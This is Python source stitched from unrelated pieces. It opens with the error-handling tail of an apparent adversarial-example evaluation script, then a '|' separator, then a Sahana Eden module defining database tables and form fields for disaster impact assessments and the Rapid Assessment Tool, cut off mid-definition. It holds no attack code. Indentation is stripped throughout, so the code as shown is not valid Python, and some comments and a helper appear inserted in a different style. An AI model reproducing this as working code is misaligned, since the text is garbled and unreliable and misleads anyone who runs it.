except Exception:  # don't shadow the epsilon loop variable e; details come from traceback.format_exc()
print(str(traceback.format_exc()))
error_log.write("Failed on attack_detail {0}: {1}\n".format(str(attack_detail), str(traceback.format_exc())))
finally:
pass
if __name__ == '__main__':
try:
main()
except Exception as e:
print(traceback.format_exc())
|
# -*- coding: utf-8 -*-
"""
Assessments
This module currently contains 2 types of Assessments
* Flexible Impact Assessments (including Mobile access)
* Rapid Assessment Tool (from ECB: http://www.ecbproject.org/page/48)
@ToDo: Migrate this to a Template in the Survey module
@ToDo: Validation similar to sitrep_school_report_onvalidation()
http://bazaar.launchpad.net/~flavour/sahana-eden/trunk/annotate/head:/models/sitrep.py#L99
It also contains some Baseline Data:
* Populations
http://eden.sahanafoundation.org/wiki/BluePrintBaselineData
"""
module = request.controller
resourcename = request.function
if not settings.has_module(module):
raise HTTP(404, body="Module disabled: %s" % module)
# -----------------------------------------------------------------------------
# Define the Model
# @ToDo: Move to modules/s3db/assess.py
# - here it isn't visible to s3db.load_all_models() or Sync
# -----------------------------------------------------------------------------
assess_severity_opts = {
0: T("Low"),
1: T("Medium"),
2: T("High"),
3: T("Very High"),
}
assess_colour_opts = {
0:"green",
1:"yellow",
2:"orange",
3:"red"
}
def s3_assess_severity_represent(value):
if value is not None: # severity 0 ("Low") is a valid value and should still render its icon
return IMG(_src="/%s/static/img/%s_circle_16px.png" %
(appname, assess_colour_opts[value]),
_alt= value,
_align="middle"
)
else:
return NONE
repr_select = lambda l: len(l.name) > 48 and "%s..." % l.name[:44] or l.name
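# e.g. a 60-character name is represented by its first 44 characters followed by "...",
# while names of 48 characters or fewer are shown unchanged.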
S3Represent = s3base.S3Represent
add_components = s3db.add_components
configure = s3db.configure
crud_strings = s3.crud_strings
define_table = db.define_table
location_id = s3db.gis_location_id
person_id = s3db.pr_person_id
organisation_id = s3db.org_organisation_id
organisation_represent = s3db.org_organisation_represent
sector_id = s3db.org_sector_id
human_resource_id = s3db.hrm_human_resource_id
ireport_id = s3db.irs_ireport_id
# Impact as component of assessments
add_components("assess_assess", impact_impact="assess_id")
def assess_tables():
""" Load the Assess Tables when needed """
module = "assess"
# =========================================================================
# Flexible Impact Assessments
# =========================================================================
# Assessment
#
resourcename = "assess"
tablename = "assess_assess"
define_table(tablename,
Field("datetime", "datetime",
label = T("Date & Time"),
default = request.utcnow),
location_id(widget = S3LocationAutocompleteWidget(),
requires = IS_LOCATION()),
organisation_id(widget = S3OrganisationAutocompleteWidget(default_from_profile=True)),
person_id("assessor_person_id",
label = T("Assessor"),
default = s3_logged_in_person()),
s3_comments(),
ireport_id(), # Assessment can be linked to an Incident Report
*s3_meta_fields())
assess_id = S3ReusableField("assess_id", "reference %s" % tablename,
requires = IS_NULL_OR(
IS_ONE_OF(db, "assess_assess.id", "%(id)s")
),
represent = lambda id: id,
label = T("Assessment"),
ondelete = "RESTRICT")
# CRUD strings
ADD_ASSESSMENT = T("Add Assessment")
crud_strings[tablename] = Storage(
label_create = ADD_ASSESSMENT,
title_display = T("Assessment Details"),
title_list = T("Assessments"),
title_update = T("Edit Assessment"),
label_list_button = T("List Assessments"),
label_delete_button = T("Delete Assessment"),
msg_record_created = T("Assessment added"),
msg_record_modified = T("Assessment updated"),
msg_record_deleted = T("Assessment deleted"),
msg_list_empty = T("No Assessments currently registered"),
name_nice = T("Assessment"),
name_nice_plural = T("Assessments"))
# assess_assess as component of org_organisation
add_components("org_organisation", assess_assess="organisation_id")
# Hide Add Assessment functionality. Users should only add assessments
# through the Basic Assessment.
configure(tablename,
insertable=False)
# =========================================================================
# Baseline Type
#
tablename = "assess_baseline_type"
define_table(tablename,
Field("name", length=128, notnull=True, unique=True),
*s3_meta_fields())
# CRUD strings
ADD_BASELINE_TYPE = T("Add Baseline Type")
crud_strings[tablename] = Storage(
label_create = ADD_BASELINE_TYPE,
title_display = T("Baseline Type Details"),
title_list = T("Baseline Types"),
title_update = T("Edit Baseline Type"),
label_list_button = T("List Baseline Types"),
label_delete_button = T("Delete Baseline Type"),
msg_record_created = T("Baseline Type added"),
msg_record_modified = T("Baseline Type updated"),
msg_record_deleted = T("Baseline Type deleted"),
msg_list_empty = T("No Baseline Types currently registered"),
name_nice = T("Baseline Type"),
name_nice_plural = T("Baseline Types"))
def baseline_type_comment():
# ToDo: Is this membership check required?
if auth.has_membership(auth.id_group("'Administrator'")):
return S3AddResourceLink(c="assess",
f="baseline_type",
label=ADD_BASELINE_TYPE)
else:
return None
represent = S3Represent(tablename)
baseline_type_id = S3ReusableField("baseline_type_id", "reference %s" % tablename,
sortby="name",
requires = IS_NULL_OR(IS_ONE_OF(db,
"assess_baseline_type.id",
represent,
sort=True)),
represent = represent,
label = T("Baseline Type"),
comment = baseline_type_comment(),
ondelete = "RESTRICT"
)
# =========================================================================
# Baseline
#
tablename = "assess_baseline"
define_table(tablename,
# Hide FK fields in forms
assess_id(readable = False, writable = False),
baseline_type_id(),
Field("value", "double"),
s3_comments(),
*s3_meta_fields())
# CRUD strings
ADD_BASELINE = T("Add Baseline")
crud_strings[tablename] = Storage(
label_create = ADD_BASELINE,
title_display = T("Baselines Details"),
title_list = T("Baselines"),
title_update = T("Edit Baseline"),
label_list_button = T("List Baselines"),
label_delete_button = T("Delete Baseline"),
msg_record_created = T("Baseline added"),
msg_record_modified = T("Baseline updated"),
msg_record_deleted = T("Baseline deleted"),
msg_list_empty = T("No Baselines currently registered"),
name_nice = T("Baseline"),
name_nice_plural = T("Baselines"))
# Baseline as component of assessments
add_components("assess_assess", assess_baseline="assess_id")
# =========================================================================
# Summary
#
tablename = "assess_summary"
define_table(tablename,
assess_id(readable = False, writable = False),
sector_id(),
#Field("value", "double"),
Field("value", "integer",
default = 0,
label = T("Severity"),
requires = IS_EMPTY_OR(IS_IN_SET(assess_severity_opts)),
widget = SQLFORM.widgets.radio.widget,
represent = s3_assess_severity_represent),
s3_comments(),
*s3_meta_fields())
# CRUD strings
ADD_ASSESS_SUMMARY = T("Add Assessment Summary")
crud_strings[tablename] = Storage(
label_create = ADD_ASSESS_SUMMARY,
title_display = T("Assessment Summary Details"),
title_list = T("Assessment Summaries"),
title_update = T("Edit Assessment Summary"),
label_list_button = T("List Assessment Summaries"),
label_delete_button = T("Delete Assessment Summary"),
msg_record_created = T("Assessment Summary added"),
msg_record_modified = T("Assessment Summary updated"),
msg_record_deleted = T("Assessment Summary deleted"),
msg_list_empty = T("No Assessment Summaries currently registered"),
name_nice = T("Assessment"),
name_nice_plural = T("Assessments"))
# Summary as component of assessments
add_components("assess_assess", assess_summary="assess_id")
# Pass variables back to global scope (response.s3.*)
return dict(
assess_id = assess_id
)
# =========================================================================
# Rapid Assessment Tool
# =========================================================================
def rat_tables():
""" Load the RAT Tables when needed """
module = "assess"
# Load the models we depend on
if settings.has_module("cr"):
shelter_id = s3db.shelter_id
if settings.has_module("hrm"):
human_resource_id = s3db.hrm_human_resource_id
else:
human_resource_id = s3db.pr_person_id
# Section CRUD strings
ADD_SECTION = T("Add Section")
rat_section_crud_strings = Storage(
label_create = ADD_SECTION,
title_display = T("Section Details"),
title_list = T("Sections"),
title_update = "",
label_list_button = T("List Sections"),
label_delete_button = T("Delete Section"),
msg_record_created = T("Section updated"),
msg_record_modified = T("Section updated"),
msg_record_deleted = T("Section deleted"),
msg_list_empty = T("No Sections currently registered"),
name_nice = T("Search"),
name_nice_plural = T("Searches"))
# -------------------------------------------------------------------------
# Common options
rat_walking_time_opts = {
1: T("0-15 minutes"),
2: T("15-30 minutes"),
3: T("30-60 minutes"),
4: T("over one hour"),
999: NOT_APPLICABLE
}
# -------------------------------------------------------------------------
# Helper functions
def rat_represent_multiple(set, opt):
"""
Represent an IS_IN_SET with multiple=True as
comma-separated list of options
@param set: the options set as dict
@param opt: the selected option(s)
"""
if isinstance(opt, (list, tuple)):
opts = opt
vals = [str(set.get(o, o)) for o in opts]
#elif isinstance(opt, basestring):
# opts = opt.split("|")
# vals = [str(set.get(int(o), o)) for o in opts if o]
elif isinstance(opt, int):
opts = [opt]
vals = [str(set.get(opt, opt))]
else:
return T("None")
if len(opts) > 1:
vals = ", ".join(vals)
else:
vals = len(vals) and vals[0] or ""
return vals
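# Example (illustrative): rat_represent_multiple({1: T("Village"), 2: T("Urban area")}, [1, 2])
# -> "Village, Urban area", while a single integer option returns just its own label.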
def rat_tooltip(tooltip, multiple=False):
"""
Prepare tooltip
"""
if multiple:
comment = DIV("(%s)" % T("Select all that apply"),
DIV(_class="tooltipbody",
_title="|%s" % T(tooltip)))
else:
comment = DIV(DIV(_class="tooltipbody",
_title="|%s" % T(tooltip)))
return comment
def rat_label_and_tooltip(label, tooltip, multiple=False):
"""
Prepare tooltip that incorporates a field's label
"""
label = T(label)
if multiple:
comment = DIV("(%s)" % T("Select all that apply"),
DIV(_class="tooltip",
_title="%s|%s" % (T(label), T(tooltip))))
else:
comment = DIV(DIV(_class="tooltip",
_title="%s|%s" % (T(label), T(tooltip))))
return {"label": label, "comment": comment}
rat_interview_location_opts = {
1:T("Village"),
2:T("Urban area"),
3:T("Collective center"),
4:T("Informal camp"),
5:T("Formal camp"),
6:T("School"),
7:T("Mosque"),
8:T("Church"),
99:T("Other")
}
rat_interviewee_opts = {
1:T("Male"),
2:T("Female"),
3:T("Village Leader"),
4:T("Informal Leader"),
5:T("Community Member"),
6:T("Religious Leader"),
7:T("Police"),
8:T("Healthcare Worker"),
9:T("School Teacher"),
10:T("Womens Focus Groups"),
11:T("Child (< 18 yrs)"),
99:T("Other")
}
rat_accessibility_opts = {
1:T("2x4 Car"),
2:T("4x4 Car"),
3:T("Truck"),
4:T("Motorcycle"),
5:T("Boat"),
6:T("Walking Only"),
7:T("No access at all"),
99:T("Other")
}
# Main Resource -----------------------------------------------------------
# contains Section 1: Identification Information
#
tablename = "assess_rat"
define_table(tablename,
Field("date", "date",
requires = [IS_DATE(format = settings.get_L10n_date_format()),
IS_NOT_EMPTY()],
default = datetime.datetime.today()),
location_id(widget = S3LocationAutocompleteWidget(),
requires = IS_LOCATION()),
human_resource_id("staff_id", label=T("Staff")),
human_resource_id("staff2_id", label=T("Staff2")),
Field("interview_location", "list:integer",
label = T("Interview taking place at"),
requires = IS_NULL_OR(IS_IN_SET(rat_interview_location_opts,
multiple=True,
zero=None)),
#widget = SQLFORM.widgets.checkboxes.widget,
represent = lambda opt, set=rat_interview_location_opts: \
rat_represent_multiple(set, opt),
comment = "(%s)" % T("Select all that apply")),
Field("interviewee", "list:integer",
label = T("Person interviewed"),
requires = IS_NULL_OR(IS_IN_SET(rat_interviewee_opts,
multiple=True,
zero=None)),
#widget = SQLFORM.widgets.checkboxes.widget,
represent = lambda opt, set=rat_interviewee_opts: \
rat_represent_multiple(set, opt),
comment = "(%s)" % T("Select all that apply")),
Field("accessibility", "integer",
label = T("Accessibility of Affected Location"),
requires = IS_NULL_OR(IS_IN_SET(rat_accessibility_opts,
zero=None)),
represent = lambda opt: rat_accessibility_opts.get(opt, opt)),
s3_comments(),
#document_id(), # Better to have multiple Documents on a Tab
s3db.shelter_id(),
*s3_meta_fields())
# CRUD strings
ADD_ASSESSMENT = T("Add Rapid Assessment")
crud_strings[tablename] = Storage(
label_create = ADD_ASSESSMENT,
title_display = T("Rapid Assessment Details"),
title_list = T("Rapid Assessments"),
title_update = T("Edit Rapid Assessment"),
label_list_button = T("List Rapid Assessments"),
label_delete_button = T("Delete Rapid Assessment"),
msg_record_created = T("Rapid Assessment added"),
msg_record_modified = T("Rapid Assessment updated"),
msg_record_deleted = T("Rapid Assessment deleted"),
msg_list_empty = T("No Rapid Assessments currently registered"),
name_nice = T("Rapid Assessment"),
name_nice_plural = T("Rapid Assessments"))
# -------------------------------------------------------------------------
def rat_assessment_onaccept(form):
id = form.vars.get("id", None)
if id:
for x in xrange(2, 10):
section = "assess_section%s" % x
set = db(db[section].assessment_id == id)
record = set.select(db[section].id, limitby=(0, 1)).first()
if not record:
db[section].insert(assessment_id=id)
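# i.e. once a Rapid Assessment is accepted, an empty record is created in each of the
# section tables assess_section2 ... assess_section9 that does not yet have one, so every
# section tab has a row ready for editing.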
# -------------------------------------------------------------------------
def rat_represent(id):
""" Represent assessment as string """
table = db.assess_rat
row = db(table.id == id).select(table.date,
table.staff_id,
table.staff2_id,
table.location_id,
limitby = (0, 1)).first()
if row:
date = row.date and str(row.date) or ""
location = row.location_id and s3db.gis_LocationRepresent()(row.location_id) or ""
table = db.org_staff
org = ["", ""]
i = 0
for staff_id in [row.staff_id, row.staff2_id]:
if staff_id:
staff = db(table.id == staff_id).select(table.organisation_id,
limitby=(0, 1)).first()
if staff:
org[i] = organisation_represent(staff.organisation_id)
i += 1
assessment_represent = XML("<div>%s %s, %s %s</div>" % (location, org[0], org[1], date))
else:
assessment_represent = NONE
return assessment_represent
# -------------------------------------------------------------------------
# re-usable field
assessment_id = S3ReusableField("assessment_id", "reference %s" % tablename,
requires = IS_NULL_OR(
IS_ONE_OF(db, "assess_rat.id",
rat_represent,
orderby="assess_rat.id")
),
#represent = rat_represent,
readable = False, writable = False,
#label = T("Rapid Assessment"),
#comment = A(ADD_ASSESSMENT,
# _class="s3_add_resource_link",
# _href=URL(c="assess", f="rat",
# args="create",
# vars=dict(format="popup")),
# _target="top",
# _title=ADD_ASSESSMENT),
ondelete = "RESTRICT")
# Assessment as component of cr_shelter.
# RAT has components itself, so best not to constrain within the parent resource tabs
# - therefore disable the listadd & jump out of the tabs for Create/Update
add_components("cr_shelter", assess_rat="shelter_id")
configure(tablename,
listadd=False, # We override this in the RAT controller for when not a component
onaccept=rat_assessment_onaccept)
# Section 2: Demographic --------------------------------------------------
tablename = "assess_section2"
define_table(tablename,
assessment_id(),
Field("population_total", "integer",
label = T("Total population of site visited"),
comment = T("people")),
Field("households_total", "integer",
label = T("Total # of households of site visited"),
comment = T("households")),
Field("population_affected", "integer",
label = T("Estimated # of people who are affected by the emergency"),
comment = T("people")),
Field("households_affected", "integer",
label = T("Estimated # of households who are affected by the emergency"),
comment = T("households")),
Field("male_05", "double",
label = T("Number/Percentage of affected population that is Male & Aged 0-5")),
Field("male_612", "double",
label = T("Number/Percentage of affected population that is Male & Aged 6-12")),
Field("male_1317", "double",
label = T("Number/Percentage of affected population that is Male & Aged 13-17")),
Field("male_1825", "double",
label = T("Number/Percentage of affected population that is Male & Aged 18-25")),
Field("male_2660", "double",
label = T("Number/Percentage of affected population that is Male & Aged 26-60")),
Field("male_61", "double",
label = T("Number/Percentage of affected population that is Male & Aged 61+")),
Field("female_05", "double",
label = T("Number/Percentage of affected population that is Female & Aged 0-5")),
Field("female_612", "double",
label = T("Number/Percentage of affected population that is Female & Aged 6-12")),
Field("female_1317", "double",
label = T("Number/Percentage of affected population that is Female & Aged 13-17")),
Field("female_1825", "double",
label = T("Number/Percentage of affected population that is Female & Aged 18-25")),
Field("female_2660", "double",
label = T("Number/Percentage of affected population that is Female & Aged 26-60")),
Field("female_61", "double",
label = T("Number/Percentage of affected population that is Female & Aged 61+")),
Field("dead_women", "integer",
label = T("How many Women (18 yrs+) are Dead due to the crisis"),
comment = T("people")), # @ToDo: Should this say "Number of people"?
Field("dead_men", "integer",
label = T("How many Men (18 yrs+) are Dead due to the crisis"),
comment = T("people")),
Field("dead_girl", "integer",
label = T("How many Girls (0-17 yrs) are Dead due to the crisis"),
comment = T("people")),
Field("dead_boy", "integer",
label = T("How many Boys (0-17 yrs) are Dead due to the crisis"),
comment = T("people")),
Field("injured_women", "integer",
label = T("How many Women (18 yrs+) are Injured due to the crisis"),
comment = T("people")),
Field("injured_men", "integer",
label = T("How many Men (18 yrs+) are Injured due to the crisis"),
comment = T("people")),
Field("injured_girl", "integer",
label = T("How many Girls (0-17 yrs) are Injured due to the crisis"),
comment = T("people")),
Field("injured_boy", "integer",
label = T("How many Boys (0-17 yrs) are Injured due to the crisis"),
comment = T("people")),
Field("missing_women", "integer",
label = T("How many Women (18 yrs+) are Missing due to the crisis"),
comment = T("people")),
Field("missing_men", "integer",
label = T("How many Men (18 yrs+) are Missing due to the crisis"),
comment = T("people")),
Field("missing_girl", "integer",
label = T("How many Girls (0-17 yrs) are Missing due to the crisis"),
comment = T("people")),
Field("missing_boy", "integer",
label = T("How many Boys (0-17 yrs) are Missing due to the crisis"),
comment = T("people")),
Field("household_head_elderly", "integer",
label = T("Elderly person headed households (>60 yrs)"),
comment = T("households")),
Field("household_head_female", "integer",
label = T("Female headed households"),
comment = T("households")),
Field("household_head_child", "integer",
label = T("Child headed households (<18 yrs)"),
comment = T("households")),
Field("disabled_physical", "integer",
label = T("Persons with disability (physical)"),
comment = T("people")),
Field("disabled_mental", "integer",
label = T("Persons with disability (mental)"),
comment = T("people")),
Field("pregnant", "integer",
label = T("Pregnant women"),
comment = T("people")),
Field("lactating", "integer",
label = T("Lactating women"),
comment = T("people")),
Field("minorities", "integer",
label = T("Migrants or ethnic minorities"),
comment = T("people")),
s3_comments(),
*s3_meta_fields())
# CRUD strings
crud_strings[tablename] = rat_section_crud_strings
configure(tablename, deletable=False)
# Section 3: Shelter & Essential NFIs -------------------------------------
rat_houses_salvmat_types = {
1: T("Wooden plank"),
2: T("Zinc roof"),
3: T("Bricks"),
4: T("Wooden poles"),
5: T("Door frame"),
6: T("Window frame"),
7: T("Roof tile"),
999: NOT_APPLICABLE
}
rat_water_container_types = {
1: T("Jerry can"),
2: T("Bucket"),
3: T("Water gallon"),
99: T("Other (specify)")
}
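# The list:integer fields below all follow the same pattern: an IS_IN_SET
# validator over one of the option dicts above, plus a represent callback that
# delegates to rat_represent_multiple() (defined earlier in this file).
# Illustrative sketch only (an assumption about its behaviour, not the actual
# implementation): a minimal equivalent helper could look like this.
def _rat_represent_multiple_sketch(options, opt):
    """Join the labels of the selected option keys; '-' if nothing is selected."""
    if not opt:
        return "-"
    keys = opt if isinstance(opt, (list, tuple)) else [opt]
    return ", ".join(str(options.get(key, UNKNOWN_OPT)) for key in keys)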
tablename = "assess_section3"
define_table(tablename,
assessment_id(),
Field("houses_total", "integer",
label = T("Total number of houses in the area"),
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 99999999)),
),
Field("houses_destroyed", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 99999999)),
**rat_label_and_tooltip(
"Number of houses destroyed/uninhabitable",
"How many houses are uninhabitable (uninhabitable = foundation and structure destroyed)?")),
Field("houses_damaged", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 99999999)),
**rat_label_and_tooltip(
"Number of houses damaged, but usable",
"How many houses suffered damage but remain usable (usable = windows broken, cracks in walls, roof slightly damaged)?")),
Field("houses_salvmat", "list:integer",
requires = IS_NULL_OR(IS_IN_SET(rat_houses_salvmat_types,
multiple=True,
zero=None)),
represent = lambda opt, set=rat_houses_salvmat_types: \
rat_represent_multiple(set, opt),
**rat_label_and_tooltip(
"Salvage material usable from destroyed houses",
"What type of salvage material can be used from destroyed houses?",
multiple=True)),
Field("water_containers_available", "boolean",
**rat_label_and_tooltip(
"Water storage containers available for HH",
"Do households have household water storage containers?")),
Field("water_containers_sufficient", "boolean",
**rat_label_and_tooltip(
"Water storage containers sufficient per HH",
"Do households each have at least 2 containers (10-20 litres each) to hold water?")),
Field("water_containers_types", "list:integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_water_container_types,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_water_container_types: \
rat_represent_multiple(set, opt),
**rat_label_and_tooltip(
"Types of water storage containers available",
"What types of household water storage containers are available?",
multiple=True)),
Field("water_containers_types_other",
label = T("Other types of water storage containers")),
Field("cooking_equipment_available", "boolean",
**rat_label_and_tooltip(
"Appropriate cooking equipment/materials in HH",
"Do households have appropriate equipment and materials to cook their food (stove, pots, dished plates, and a mug/drinking vessel, etc)?")),
Field("sanitation_items_available", "boolean",
**rat_label_and_tooltip(
"Reliable access to sanitation/hygiene items",
"Do people have reliable access to sufficient sanitation/hygiene items (bathing soap, laundry soap, shampoo, toothpaste and toothbrush)?")),
Field("sanitation_items_available_women", "boolean",
**rat_label_and_tooltip(
"Easy access to sanitation items for women/girls",
"Do women and girls have easy access to sanitary materials?")),
Field("bedding_materials_available", "boolean",
**rat_label_and_tooltip(
"Bedding materials available",
"Do households have bedding materials available (tarps, plastic mats, blankets)?")),
Field("clothing_sets_available", "boolean",
**rat_label_and_tooltip(
"Appropriate clothing available",
"Do people have at least 2 full sets of clothing (shirts, pants/sarong, underwear)?")),
Field("nfi_assistance_available", "boolean",
**rat_label_and_tooltip(
"Shelter/NFI assistance received/expected",
"Have households received any shelter/NFI assistance or is assistance expected in the coming days?")),
Field("kits_hygiene_received", "boolean",
label = T("Hygiene kits received")),
Field("kits_hygiene_source",
label = T("Hygiene kits, source")),
Field("kits_household_received", "boolean",
label = T("Household kits received")),
Field("kits_household_source",
label = T("Household kits, source")),
Field("kits_dwelling_received", "boolean",
label = T("Family tarpaulins received")), # @ToDo: Better label, perhaps? A tarp isn't a dwelling.
Field("kits_dwelling_source",
label = T("Family tarpaulins, source")),
s3_comments(),
*s3_meta_fields())
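# (Assumption: rat_label_and_tooltip(label, tooltip, multiple=False), defined
# earlier in this file, returns a dict of Field keyword arguments -- roughly
# {"label": T(label), "comment": rat_tooltip(tooltip, multiple)} -- which is why
# it is expanded with ** into the Field() constructors above.)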
# CRUD strings
crud_strings[tablename] = rat_section_crud_strings
configure(tablename, deletable=False)
# Section 4 - Water and Sanitation ----------------------------------------
rat_water_source_types = {
1: T("PDAM"),
2: T("Dug Well"),
3: T("Spring"),
4: T("River"),
5: T("Other Faucet/Piped Water"),
99: T("Other (describe)"),
999: NOT_APPLICABLE
}
rat_water_coll_person_opts = {
1: T("Child"),
2: T("Adult male"),
3: T("Adult female"),
4: T("Older person (>60 yrs)"),
999: NOT_APPLICABLE
}
rat_defec_place_types = {
1: T("open defecation"),
2: T("pit"),
3: T("latrines"),
4: T("river"),
99: T("other")
}
rat_defec_place_animals_opts = {
1: T("enclosed area"),
2: T("within human habitat"),
999: NOT_APPLICABLE
}
rat_latrine_types = {
1: T("flush latrine with septic tank"),
2: T("pit latrine"),
999: NOT_APPLICABLE
}
tablename = "assess_section4"
define_table(tablename,
assessment_id(),
Field("water_source_pre_disaster_type", "integer",
label = T("Type of water source before the disaster"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_water_source_types,
zero=None)),
represent = lambda opt: rat_water_source_types.get(opt,
UNKNOWN_OPT)),
Field("water_source_pre_disaster_description",
label = T("Description of water source before the disaster")),
Field("dwater_source_type", "integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_water_source_types,
zero=None)),
represent = lambda opt: rat_water_source_types.get(opt,
UNKNOWN_OPT),
**rat_label_and_tooltip(
"Current type of source for drinking water",
"What is your major source of drinking water?")),
Field("dwater_source_description",
label = T("Description of drinking water source")),
Field("dwater_reserve",
**rat_label_and_tooltip(
"How long will this water resource last?",
"Specify the minimum sustainability in weeks or days.")),
Field("swater_source_type", "integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_water_source_types,
zero=None)),
represent = lambda opt: rat_water_source_types.get(opt,
UNKNOWN_OPT),
**rat_label_and_tooltip(
"Current type of source for sanitary water",
"What is your major source of clean water for daily use (ex: washing, cooking, bathing)?")),
Field("swater_source_description",
label = T("Description of sanitary water source")),
Field("swater_reserve",
**rat_label_and_tooltip(
"How long will this water resource last?",
"Specify the minimum sustainability in weeks or days.")),
Field("water_coll_time", "integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_walking_time_opts,
zero=None)),
represent = lambda opt: rat_walking_time_opts.get(opt,
UNKNOWN_OPT),
**rat_label_and_tooltip(
"Time needed to collect water",
"How long does it take you to reach the available water resources? Specify the time required to go there and back, including queuing time, by foot.")),
Field("water_coll_safe", "boolean",
label = T("Is it safe to collect water?"),
default = True),
Field("water_coll_safety_problems",
label = T("If no, specify why")),
Field("water_coll_person", "integer",
label = T("Who usually collects water for the family?"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_water_coll_person_opts,
zero=None)),
represent = lambda opt: rat_water_coll_person_opts.get(opt,
UNKNOWN_OPT)),
Field("defec_place_type",
requires = IS_EMPTY_OR(IS_IN_SET(rat_defec_place_types,
zero=None,
multiple=True)),
represent = lambda opt: rat_defec_place_types.get(opt,
UNKNOWN_OPT),
**rat_label_and_tooltip(
"Type of place for defecation",
"Where do the majority of people defecate?",
multiple=True)),
Field("defec_place_description",
label = T("Description of defecation area")),
Field("defec_place_distance", "integer",
label = T("Distance between defecation area and water source"),
comment = T("meters")),
Field("defec_place_animals", "integer",
label = T("Defecation area for animals"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_defec_place_animals_opts,
zero = None)),
represent = lambda opt: rat_defec_place_animals_opts.get(opt,
UNKNOWN_OPT)),
Field("close_industry", "boolean",
**rat_label_and_tooltip(
"Industry close to village/camp",
"Is there any industrial or agro-chemical production close to the affected area/village?")),
Field("waste_disposal",
**rat_label_and_tooltip(
"Place for solid waste disposal",
"Where is solid waste disposed in the village/camp?")),
Field("latrines_number", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Number of latrines",
"How many latrines are available in the village/IDP centre/Camp?")),
Field("latrines_type", "integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_latrine_types,
zero=None)),
represent = lambda opt: rat_latrine_types.get(opt,
UNKNOWN_OPT),
**rat_label_and_tooltip(
"Type of latrines",
"What type of latrines are available in the village/IDP centre/Camp?")),
Field("latrines_separation", "boolean",
**rat_label_and_tooltip(
"Separate latrines for women and men",
"Are there separate latrines for women and men available?")),
Field("latrines_distance", "integer",
**rat_label_and_tooltip(
"Distance between shelter and latrines",
"Distance between latrines and temporary shelter in meters")),
s3_comments(),
*s3_meta_fields())
# CRUD strings
crud_strings[tablename] = rat_section_crud_strings
configure(tablename, deletable=False)
# Section 5 - Health ------------------------------------------------------
rat_health_services_types = {
1: T("Community Health Center"),
2: T("Hospital")
}
rat_health_problems_opts = {
1: T("Respiratory Infections"),
2: T("Diarrhea"),
3: T("Dehydration"),
99: T("Other (specify)")
}
rat_infant_nutrition_alternative_opts = {
1: T("Porridge"),
2: T("Banana"),
3: T("Instant Porridge"),
4: T("Air tajin"),
99: T("Other (specify)")
}
tablename = "assess_section5"
define_table(tablename,
assessment_id(),
Field("health_services_pre_disaster", "boolean",
**rat_label_and_tooltip(
"Health services functioning prior to disaster",
"Were there health services functioning for the community prior to the disaster?")),
Field("medical_supplies_pre_disaster", "boolean",
**rat_label_and_tooltip(
"Basic medical supplies available prior to disaster",
"Were basic medical supplies available for health services prior to the disaster?")),
Field("health_services_post_disaster", "boolean",
**rat_label_and_tooltip(
"Health services functioning since disaster",
"Are there health services functioning for the community since the disaster?")),
Field("medical_supplies_post_disaster", "boolean",
**rat_label_and_tooltip(
"Basic medical supplies available since disaster",
"Are basic medical supplies available for health services since the disaster?")),
Field("medical_supplies_reserve", "integer",
label = T("How many days will the supplies last?")),
Field("health_services_available_types", "list:integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_health_services_types,
zero=None, multiple=True)),
represent = lambda opt: \
rat_represent_multiple(rat_health_services_types, opt),
**rat_label_and_tooltip(
"Types of health services available",
"What types of health services are still functioning in the affected area?",
multiple=True)),
Field("staff_number_doctors", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Number of doctors actively working",
"How many doctors in the health centers are still actively working?")),
Field("staff_number_nurses", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Number of nurses actively working",
"How many nurses in the health centers are still actively working?")),
Field("staff_number_midwives", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Number of midwives actively working",
"How many midwives in the health centers are still actively working?")),
Field("health_service_walking_time", "integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_walking_time_opts,
zero=None)),
represent = lambda opt: rat_walking_time_opts.get(opt,
UNKNOWN_OPT),
**rat_label_and_tooltip(
"Walking time to the health service",
"How long does it take you to walk to the health service?")),
Field("health_problems_adults", "list:integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_health_problems_opts,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_health_problems_opts: \
rat_represent_multiple(set, opt),
**rat_label_and_tooltip(
"Current type of health problems, adults",
"What types of health problems do people currently have?",
multiple=True)),
Field("health_problems_adults_other",
label = T("Other current health problems, adults")),
Field("health_problems_children", "list:integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_health_problems_opts,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_health_problems_opts: \
rat_represent_multiple(set, opt),
**rat_label_and_tooltip(
"Current type of health problems, children",
"What types of health problems do children currently have?",
multiple=True)),
Field("health_problems_children_other",
label = T("Other current health problems, children")),
Field("chronical_illness_cases", "boolean", # @ToDo: "chronic illness"?
**rat_label_and_tooltip(
"People with chronical illnesses",
"Are there people with chronical illnesses in your community?")),
Field("chronical_illness_children", "boolean",
**rat_label_and_tooltip(
"Children with chronical illnesses",
"Are there children with chronical illnesses in your community?")),
Field("chronical_illness_elderly", "boolean",
**rat_label_and_tooltip(
"Older people with chronical illnesses",
"Are there older people with chronical illnesses in your community?")),
Field("chronical_care_sufficient", "boolean",
**rat_label_and_tooltip(
"Sufficient care/assistance for chronically ill",
"Are the chronically ill receiving sufficient care and assistance?")),
Field("malnutrition_present_pre_disaster", "boolean",
**rat_label_and_tooltip(
"Malnutrition present prior to disaster",
"Were there cases of malnutrition in this area prior to the disaster?")),
Field("mmd_present_pre_disaster", "boolean",
**rat_label_and_tooltip(
"Micronutrient malnutrition prior to disaster",
